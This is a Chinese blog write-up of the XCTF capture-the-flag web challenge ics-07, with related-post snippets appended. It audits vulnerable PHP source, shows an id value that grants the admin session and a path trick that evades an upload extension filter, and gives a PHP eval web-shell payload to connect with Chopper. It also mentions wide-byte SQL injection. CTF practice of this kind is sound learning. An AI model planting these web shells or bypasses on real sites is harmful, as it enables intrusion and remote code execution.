xctf-web-ics07

最新推荐文章于 2024-05-06 16:00:05 发布
最新推荐文章于 2024-05-06 16:00:05 发布
阅读量150 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhejichensha_l7l/article/details/113820885
版权

文章目录

瞎分析

感觉就是道php代码审计+文件上传题目
(可能有错,请各位哥哥姐姐们指点指点)

过程

代码如下(示例):

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>cetc7</title>
  </head>
  <body>
    <?php
    session_start();

    if (!isset($_GET[page])) {
      show_source(__FILE__);
      die();
    }

    if (isset($_GET[page]) && $_GET[page] != 'index.php') {
      include('flag.php');
    }else {
      header('Location: ?page=flag.php');
    }

    ?>

    <form action="#" method="get">
      page : <input type="text" name="page" value="">
      id : <input type="text" name="id" value="">
      <input type="submit" name="submit" value="submit">
    </form>
    <br />
    <a href="index.phps">view-source</a>

    <?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
          die("Bad file extension");
       }else{
            chdir('uploaded');
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     ?>

    <?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>

  </body>
</html>

这里分三个部分去看

第一部分

在这里插入图片描述
这里好像没啥

第二部分

在这里插入图片描述
这里关键
session=admin才执行下面
con是文件内容
file是文件名字
然后就是对于一些正则绕过文件过滤
这里先分析过程。做法下面说
然后通过
preg_match(’/.+.ph(p[3457]?|t|tml)$/i’, $filename)
放到uploaded/backup下

第三部分

在这里插入图片描述
这里需要
isset($ _ GET [id])不为空

floatval($ _ GET [id])!==‘1’ //浮点不为1

substr($ _ GET [id],-1)==='9‘ //id最后一位为9

具体参考
函数学习
链接: isset.
链接: floatval.
链接: substr.

实验步骤

首先
如何使得
$_SESSION[‘admin’]==true

浮点数!==‘1’,而且id最后一位是9。
我用的是id=1+9
1+9 1-9 1/9 1,9好像都可以
构建playload
在这里插入图片描述

第二步
一、文件绕过
backup是假目录需要用…/绕过
其实文件是放在uplaoded/backup下的
…/是用来定位在当前目录的父目录
二、正则过滤
preg_match(’/.+.ph(p[3457]?|t|tml)$/i’, $filename)
这里说传入的数据文件的后缀名不能为
php、php3、php4、php5、php7、pht、phtml
post的方式传输
正则过滤只过滤最后一个点的后缀名
那么我们可以写多一个.php就可以逃过了

只要id=1+9或者前面说的之类就能session=admin
此时的url=111.200.241.244:30685/index.php?page=flag.php&id=1+9
这里构建playload
以post方式传输
con=<?php @eval($_POST[cmd]);?>&file=haha.php/haha.php/…
在这里插入图片描述
再回到
111.200.241.244:30685/uploaded/backup
就能看见你所生成的文件然后用菜刀连接就可以了
在这里插入图片描述

最后一些其他

这个有意思的函数我也在书中找到他的用法
具体直接看图emmm
mysql_real_escape_string的作用以及一些绕过方法
参考链接
https://www.cnblogs.com/jylf/archive/2014/03/19/3611489.html

在这里插入图片描述
听大佬说可以用宽字节注入绕过但是前提是数据库是GBK编码
在这里插入图片描述

总结

这次是一道php代码审计题,再加一点文件上传和正则过滤的熟悉过程。真不错可以学到做题来学习到php。

折戟沉沙l7l
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XCTF-HW-pipeline附件
11-09
附件
ICS-07
weixin_52921802的博客
12-16 473
输入、输出 本章输入设备选择键盘,输出设备选择显示器 输入、输出的基本概念 设备寄存器(decice register):即使最简单的I/O设备,也至少包含两个寄存器: 一个用来保存跟计算机之间传输的数据; 另一个用来指示当前设备的状态信息。 内存映射I/O与专用I/O指令 指令访问I/O设备寄存器时,需要明确指明目标寄存器。通常有两种实现方法 采用专门的I/O指令来访问,即专用I/O指令 采用内存操作指令来完成I/O操作,即内存映射I/O 专用I/O指令就是设计好的操作码来确定其行为
攻防世界 ics-07
CyhDl666的博客
02-24 469
ics-07 hint:工控云管理系统项目管理页面解析漏洞 进入管理页面是个登录窗 左下角有个查看源码 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'.
攻防世界 ics-07 题
qq_43622442的博客
03-05 1453
攻防世界 ics-07 题 写在txt里当笔记太不方便了= =以后还是写这儿吧 1.打开首页是这样子 2.看那个提示,一开始我还以为是直接view-source,没想到那个是个超链接= =点它,出现源码 3.审计一下,利用点在这儿: 4.但是session我们无法自己伪造,看下面的代码: 5.看到sql就想注入= =但是这里宽字节并不行。看一下这句,只要result有值我们就可以上传文件了...
攻防世界 web 进阶 ics-07
weixin_42499640的博客
08-11 4525
工控云管理系统项目管理页面解析漏洞 /index.php 看到view-source 看一下源码 <?php if ($_SESSION['admin']) { $con = $_POST['con']; $file = $_POST['file']; $filename = "backup/".$file; if(pre...
xctf攻防世界ics-07 wp
sash1mi
02-20 195
xctf攻防世界ics-07 wp 考察知识点:php代码审计、命令执行 访问题目地址 随便点一点,康康能发现什么 发现这里有源码 进行php代码审计 分析: 参数page存在且其值不等于index.php,才会包含flag.php 将$ con的内容写入$ file中,但文件后缀名不能为.php3/4/5/6/7/t/html $_SESSION[‘admin’] = True可以满足以上所需 此段需要满足参数id存在,id的浮点值不为’1’,id参数的最后一个数值是9 可以使用id=1-9
xctf-web-ics05
zhejichensha_l7l的博客
02-02 214
xctf-web-ics05 前言 这道题干什么,想要告诉我们什么。。。 瞎鸡儿分析 ics05这道题,可能是在入侵后利用管理的平台来完成一些信息的收集,所以读取他的文件并利用就非常重要 提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 这里分析可能有错,单纯个人见解 过程 刚刚开始的url是:114.200.241.243:51522/index.php 看到页面有id 好家伙我又以为是sql注入了 特别是看到这个页面 正常回显。。 其实不是 认真再看看 没啥想法可以先看看这个文
XCTF-WEB-ics-06
m0_52016680的博客
03-10 5457
这道题有那么一丢丢实战的意思了,至少它是个正常的网页页面了。 能点的地方都点一点,发现报表中心能进去。 进来之后看到一个“送分题”。 日期范围随便点一点也没发现啥,f12也啥都没有。 这个时候注意到url有一个?id=1,但是双引号啊单引号啥的发现没啥用,不是sql注入。 看题目描述说有一页留下了痕迹,这个id=1应该是页数的意思,所以我们打开burpsuite爆破。 自己用python生成一个1到很大的数的字典,然后load到burp的字典里,点右上角start attack
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5....下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 ...然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个...
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
Fortinet的安全愿景SASO概述
最新发布
lurenjia404的博客
05-06 822
FTNT SASE的独特方法,使其成为一家适应性极强的厂商,能够应对不断变化的网络和网络安全环境。FTNT开发了一种名为Secure Access Service Omni(SASO)的变体,以更准确地反映FTNT在融合网络和安全功能方面的实力。我们预计,从长远来看,SASO将逐渐取代SASE。
API安全
2301_76717406的博客
05-01 1792
网络安全,信息(数据)安全,应用安全;机密性完整性可靠性。
域控安全 ----> Ntds.dit文件抓取
huohaowen的博客
05-05 1200
大家还记得内网渗透的初衷吗???找到域馆,拿下域控!!拿下了域控就是拿下了整个域!!但是大家知道拿下域环境之后应该怎么操作吗(灵魂拷问)???那么下面,开始我们今天的内容 NTDS.DIT文件!!
网络安全实训Day16
Yisitelz的博客
04-26 2355
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
WAAP动态安全解决方案
m0_66268916的博客
05-03 777
在此情况下,德迅云安全WAAP应运而生。7、协同防护:通过全站防护管理平台,对网络L3-L7层各防护模块的安全策略进行统一管理,并通过数据聚合、情报协同,形成真正的纵深防护,简化运营工作的同时进一步提升整体安全的防护水位。5、互联网暴露面资产发现:通过平台和人工服务的方式,对域名、IP及关键字的综合查询及关联分析,提供互联网资产的发现、识 别、监测、稽核等服务,帮助用户发现和梳理互联网资产;二、全站防护,在事中阶段,从网络安全、应用安全、业务安全、API安全各层面,为Web应用提供全面安全防护闭环。
Linux线程安全,互斥量和条件变量
m0_74189279的博客
05-05 1035
因此第二次申请锁失败之后这个线程就会被挂起,但是它是拿着锁被挂起的,因为被挂起了,所以就没办法释放锁,也就不会被唤醒,因此该执行流就处于一种死锁的状态了。由于–需要三条汇编指令才能完成,所以有可能线程1即thread1在执行完load 指令将共享变量ticket(1000)从内存加载到寄存器中之后就被切换了,此时thread1读到的数据是1000,当thread1被切换之后,寄存器中的数据会被当成thread1的上下文数据被保存起来,等到thread1被切回来的时候,再次恢复上下文。
web-ics-05
07-28
- *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值